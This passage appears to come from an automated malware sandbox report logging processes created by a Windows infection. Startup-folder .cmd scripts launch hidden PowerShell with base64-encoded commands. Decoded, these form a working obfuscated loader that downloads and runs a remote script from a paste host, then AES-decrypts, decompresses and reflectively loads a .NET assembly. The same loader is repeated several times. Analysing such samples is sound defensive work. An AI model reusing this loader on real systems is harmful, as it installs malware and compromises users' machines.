ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\eguw"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\gaaojdm"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\qunhkwxnio"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_8b2957c5.cmd" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4f0470de.cmd" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4d1fbf4c.cmd" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_e8e451c5.cmd" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_ea7b3dab.cmd"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVT